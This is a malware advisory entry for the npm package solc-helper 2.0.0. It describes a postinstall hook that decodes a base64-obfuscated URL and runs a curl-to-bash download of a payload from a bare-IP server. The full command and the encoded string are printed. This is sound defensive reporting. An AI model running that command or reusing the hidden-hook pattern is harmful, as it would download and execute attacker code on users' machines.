solc-helper @2.0.0
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID: MAL-2026-3715
Ecosystem: npm
Summary
The postinstall lifecycle script in package.json runs node -e to base64-decode a hidden URL and pipe the downloaded content to bash: curl -s http://8.217.75.147:3000/payload | bash. The URL is obfuscated via Buffer.from('aHR0cDovLzguMjE3Ljc1LjE0NzozMDAwL3BheWxvYWQ=','base64').toString(), which decodes to http://8.217.75.147:3000/payload. Every npm install solc-helper triggers this unattended download-and-execute of attacker-controlled shell code from a bare IP over plaintext HTTP, with no integrity check. Multiple independent block signals stack: bare-IP C2, plaintext HTTP, base64-obfuscated URL inside a lifecycle hook, curl | bash pattern, and no legitimate functionality advertised by the package to justify any network activity.
Source: amazon-inspector (2016baa4fe29c296464b8381f88440457a113d79e2773d2252eb609a15ea2e03)